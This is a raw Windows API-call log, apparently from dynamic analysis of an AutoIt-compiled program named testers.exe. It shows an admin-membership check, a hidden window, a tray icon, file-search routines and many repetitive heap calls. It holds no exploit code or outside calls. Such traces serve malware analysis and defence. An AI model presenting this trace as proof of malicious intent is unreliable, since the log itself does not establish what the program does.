HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcf3940 | out: hHeap=0xcc0000) returned 1 [0270.334] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\testers.exe", nBufferLength=0x7fff, lpBuffer=0x8dfbf0, lpFilePart=0x8ffc10 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\testers.exe", lpFilePart=0x8ffc10*="testers.exe") returned 0x2f [0270.335] CheckTokenMembership (in: TokenHandle=0x0, SidToCheck=0xce54c8*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x8dfbdc | out: IsMember=0x8dfbdc) returned 1 [0270.335] GetSysColorBrush (nIndex=15) returned 0x1100059 [0270.335] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0270.336] LoadIconW (hInstance=0x290000, lpIconName=0x63) returned 0x1e017b [0270.336] LoadIconW (hInstance=0x290000, lpIconName=0xa4) returned 0x1100d9 [0270.337] LoadIconW (hInstance=0x290000, lpIconName=0xa2) returned 0x200161 [0270.338] LoadImageW (hInst=0x290000, name=0x63, type=0x1, cx=16, cy=16, fuLoad=0x0) returned 0xa0175 [0270.338] RegisterClassExW (param_1=0x8dfbac) returned 0xc120 [0270.338] GetSysColorBrush (nIndex=15) returned 0x1100059 [0270.338] RegisterClassExW (param_1=0x8dfb50) returned 0xc125 [0270.338] RegisterClipboardFormatW (lpszFormat="TaskbarCreated") returned 0xc0c2 [0270.338] InitCommonControlsEx (picce=0x8dfb80) returned 1 [0270.339] ImageList_Create (cx=16, cy=16, flags=0x21, cInitial=1, cGrow=1) returned 0xcfcbd0 [0270.339] LoadIconW (hInstance=0x290000, lpIconName=0xa9) returned 0x160173 [0270.340] ImageList_ReplaceIcon (himl=0xcfcbd0, i=-1, hicon=0x160173) returned 0 [0270.342] CreateWindowExW (dwExStyle=0x0, lpClassName="AutoIt v3", lpWindowName="AutoIt v3", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=300, nHeight=100, hWndParent=0x0, hMenu=0x0, hInstance=0x290000, lpParam=0x0) returned 0xb016c [0270.342] NtdllDefWindowProc_W () returned 0x0 [0270.342] NtdllDefWindowProc_W () returned 0x1 [0270.345] NtdllDefWindowProc_W () returned 0x0 [0270.348] SetTimer (hWnd=0xb016c, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0270.349] RegisterClipboardFormatW (lpszFormat="TaskbarCreated") returned 0xc0c2 [0270.349] CreatePopupMenu () returned 0x1d0181 [0270.349] CreateWindowExW (dwExStyle=0x0, lpClassName="edit", lpWindowName=0x0, dwStyle=0x50b008c4, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0xb016c, hMenu=0x1, hInstance=0x290000, lpParam=0x0) returned 0xa016e [0270.363] NtdllDefWindowProc_W () returned 0x0 [0270.363] ShowWindow (hWnd=0xb016c, nCmdShow=0) returned 0 [0270.363] ShowWindow (hWnd=0xb016c, nCmdShow=0) returned 0 [0270.363] Shell_NotifyIconW (dwMessage=0x0, lpData=0x8df828) returned 1 [0270.395] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20a) returned 0xcfd660 [0270.395] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xdd5cf0 [0270.395] Shell_NotifyIconW (dwMessage=0x1, lpData=0x8df458) returned 1 [0270.395] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcfd660 | out: hHeap=0xcc0000) returned 1 [0270.395] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd5cf0 | out: hHeap=0xcc0000) returned 1 [0270.395] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0270.395] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0270.395] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xdd5cf0 [0270.395] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xdc9c70 [0270.395] CharUpperBuffW (in: lpsz="_FO_FILESEARCH", cchLength=0xe | out: lpsz="_FO_FILESEARCH") returned 0xe [0270.395] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdc9c70 | out: hHeap=0xcc0000) returned 1 [0270.395] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd5cf0 | out: hHeap=0xcc0000) returned 1 [0270.395] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0270.395] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xdd5cf0 [0270.395] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x30) returned 0xddee10 [0270.396] CharUpperBuffW (in: lpsz="_FO_FOLDERSEARCH", cchLength=0x10 | out: lpsz="_FO_FOLDERSEARCH") returned 0x10 [0270.396] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xddee10 | out: hHeap=0xcc0000) returned 1 [0270.396] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd5cf0 | out: hHeap=0xcc0000) returned 1 [0270.396] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0270.396] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xdd5cf0 [0270.396] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x30) returned 0xddee10 [0270.396] CharUpperBuffW (in: lpsz="__FO_FOLDERSEARCHMASK", cchLength=0x15 | out: lpsz="__FO_FOLDERSEARCHMASK") returned 0x15 [0270.396] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xddee10 | out: hHeap=0xcc0000) returned 1 [0270.396] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd5cf0 | out: hHeap=0xcc0000) returned 1 [0270.396] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0270.396] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xdd5cf0 [0270.396] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x30) returned 0xddee10 [0270.396] CharUpperBuffW (in: lpsz="__FO_FOLDERSEARCH", cchLength=0x11 | out: lpsz="__FO_FOLDERSEARCH") returned 0x11 [0270.396] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xddee10 | out: hHeap=0xcc0000) returned 1 [0270.396] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd5cf0 | out: hHeap=0xcc0000) returned 1 [0270.396] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0270.396] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xdd5cf0 [0270.396] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x30) returned 0xddee10 [0270.396] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0270.396] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xddee10 | out: hHeap=0xcc0000) returned 1 [0270.396] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd5cf0 | out: hHeap=0xcc0000) returned 1 [0270.396] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0270.396] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xdd5cf0 [0270.396] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x30) returned 0xddee10 [0270.396] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0270.396] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xddee10 | out: hHeap=0xcc0000) returned 1 [0270.397] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd5cf0 | out: hHeap=0xcc0000) returned 1 [0270.397] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0270.397] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xdd5cf0 [0270.397] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x30) returned 0xddee10 [0270.397] CharUpperBuffW (in: lpsz="__FO_GETLISTMASK", cchLength=0x10 | out: lpsz="__FO_GETLISTMASK") returned 0x10 [0270.397] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xddee10 | out: hHeap=0xcc0000) returned 1 [0270.397] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd5cf0 | out: hHeap=0xcc0000) returned 1 [0270.397] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0270.397] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xdd5cf0 [0270.397] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x30) returned 0xddee10 [0270.397] CharUpperBuffW (in: lpsz="__FO_FILESEARCHTYPE", cchLength=0x13 | out: lpsz="__FO_FILESEARCHTYPE") returned 0x13 [0270.397] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xddee10 | out: hHeap=0xcc0000) returned 1 [0270.397] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd5cf0 | out: hHeap=0xcc0000) returned 1 [0270.397] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0270.397] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xdd5cf0 [0270.397] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x30) returned 0xddee10 [0270.397] CharUpperBuffW (in: lpsz="__FO_FILESEARCHMASK", cchLength=0x13 | out: lpsz="__FO_FILESEARCHMASK") returned 0x13 [0270.397] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xddee10 | out: hHeap=0xcc0000) returned 1 [0270.397] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd5cf0 | out: hHeap=0xcc0000) returned 1 [0270.397] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0270.397] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xdd5cf0 [0270.397] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xdc9c70 [0270.397] CharUpperBuffW (in: lpsz="__FO_USERLOCALE", cchLength=0xf | out: lpsz="__FO_USERLOCALE") returned 0xf [0270.397] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdc9c70 | out: hHeap=0xcc0000) returned 1 [0270.397] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd5cf0 | out: hHeap=0xcc0000) returned 1 [0270.397] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0270.397] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9388 [0270.398] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9340 [0270.398] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xdd5cf0 [0270.398] RtlSizeHeap (HeapHandle=0xcc0000, Flags=0x0, MemoryPointer=0xce3138) returned 0x80 [0270.398] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xdc9c70 [0270.398] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9310 [0270.398] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xdd5d00 [0270.398] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9310 | out: hHeap=0xcc0000) returned 1 [0270.398] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xdc9c98 [0270.398] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9310 [0270.398] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9250 [0270.398] RtlSizeHeap (HeapHandle=0xcc0000, Flags=0x0, MemoryPointer=0xce3138) returned 0x80 [0270.399] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xdd5d10 [0270.399] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9250 | out: hHeap=0xcc0000) returned 1 [0270.399] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd5d10 | out: hHeap=0xcc0000) returned 1 [0270.399] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0270.399] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xdc9cc0 [0270.399] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9250 [0270.399] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xdd5d10 [0270.399] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9250 | out: hHeap=0xcc0000) returned 1 [0270.399] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xdc9ce8 [0270.399] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9250 [0270.399] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9238 [0270.399] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xdd5d20 [0270.399] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9238 | out: hHeap=0xcc0000) returned 1 [0270.399] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd5d20 | out: hHeap=0xcc0000) returned 1 [0270.399] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0270.399] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xdc9d10 [0270.399] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9238 [0270.399] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xdd5d20 [0270.399] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9238 | out: hHeap=0xcc0000) returned 1 [0270.399] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xdc9d38 [0270.399] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9238 [0270.399] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd93b8 [0270.399] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xdd5d30 [0270.399] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd93b8 | out: hHeap=0xcc0000) returned 1 [0270.399] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd5d30 | out: hHeap=0xcc0000) returned 1 [0270.399] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0270.399] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xdc9d60 [0270.400] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd93b8 [0270.400] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xdd5d30 [0270.400] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd93b8 | out: hHeap=0xcc0000) returned 1 [0270.400] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xdc9d88 [0270.400] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd93b8 [0270.400] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd93d0 [0270.400] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xdd5d40 [0270.400] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd93d0 | out: hHeap=0xcc0000) returned 1 [0270.400] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd5d40 | out: hHeap=0xcc0000) returned 1 [0270.400] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0270.400] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xdc9db0 [0270.400] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd93d0 [0270.400] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xdd5d40 [0270.400] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd93d0 | out: hHeap=0xcc0000) returned 1 [0270.400] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x30) returned 0xddee10 [0270.400] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd93d0 [0270.400] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd93e8 [0270.400] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xdd5d50 [0270.400] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd93e8 | out: hHeap=0xcc0000) returned 1 [0270.400] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd93e8 [0270.400] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xdd5d60 [0270.400] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd93e8 | out: hHeap=0xcc0000) returned 1 [0270.400] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd5d60 | out: hHeap=0xcc0000) returned 1 [0270.400] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xdc9dd8 [0270.400] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd93e8 [0270.400] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xdd5d60 [0270.400] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd5d60 | out: hHeap=0xcc0000) returned 1 [0270.401] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9400 [0270.401] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xdd5d60 [0270.401] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd5d60 | out: hHeap=0xcc0000) returned 1 [0270.401] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd93e8 | out: hHeap=0xcc0000) returned 1 [0270.401] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9400 | out: hHeap=0xcc0000) returned 1 [0270.401] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdc9dd8 | out: hHeap=0xcc0000) returned 1 [0270.401] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd5d50 | out: hHeap=0xcc0000) returned 1 [0270.401] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0270.401] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xdc9dd8 [0270.401] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9400 [0270.401] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xdd5d50 [0270.401] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9400 | out: hHeap=0xcc0000) returned 1 [0270.401] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xdc9e00 [0270.401] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9400 [0270.401] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd93e8 [0270.401] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xdd5d60 [0270.401] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd93e8 | out: hHeap=0xcc0000) returned 1 [0270.401] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd5d60 | out: hHeap=0xcc0000) returned 1 [0270.401] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0270.401] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xdc9e28 [0270.401] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd93e8 [0270.401] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xdd5d60 [0270.401] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd93e8 | out: hHeap=0xcc0000) returned 1 [0270.401] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x30) returned 0xdded68 [0270.401] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd93e8 [0270.401] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9418 [0270.401] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xdd5d70 [0270.402] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9418 | out: hHeap=0xcc0000) returned 1 [0270.402] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd5d70 | out: hHeap=0xcc0000) returned 1 [0270.402] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0270.402] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xdc9e50 [0270.402] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9418 [0270.402] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xdd5d70 [0270.402] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9418 | out: hHeap=0xcc0000) returned 1 [0270.402] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x30) returned 0xddee48 [0270.402] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9418 [0270.402] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9430 [0270.402] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xdd5d80 [0270.402] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9430 | out: hHeap=0xcc0000) returned 1 [0270.402] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd5d80 | out: hHeap=0xcc0000) returned 1 [0270.402] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0270.402] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xdc9e78 [0270.402] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9430 [0270.402] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xdd5d80 [0270.402] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9430 | out: hHeap=0xcc0000) returned 1 [0270.402] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x30) returned 0xddee80 [0270.402] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9430 [0270.402] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9448 [0270.402] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xdd5d90 [0270.402] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9448 | out: hHeap=0xcc0000) returned 1 [0270.402] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xdc9ea0 [0270.402] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9448 [0270.402] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xdd5da0 [0270.402] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd5da0 | out: hHeap=0xcc0000) returned 1 [0270.403] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9460 [0270.403] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xdd5da0 [0270.403] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd5da0 | out: hHeap=0xcc0000) returned 1 [0270.403] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9448 | out: hHeap=0xcc0000) returned 1 [0270.403] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9460 | out: hHeap=0xcc0000) returned 1 [0270.403] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdc9ea0 | out: hHeap=0xcc0000) returned 1 [0270.403] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd5d90 | out: hHeap=0xcc0000) returned 1 [0270.403] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0270.403] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xdc9ea0 [0270.403] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9460 [0270.403] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xdd5d90 [0270.403] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9460 | out: hHeap=0xcc0000) returned 1 [0270.403] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xdc9ec8 [0270.403] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9460 [0270.403] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9448 [0270.403] RtlAllocateHeap 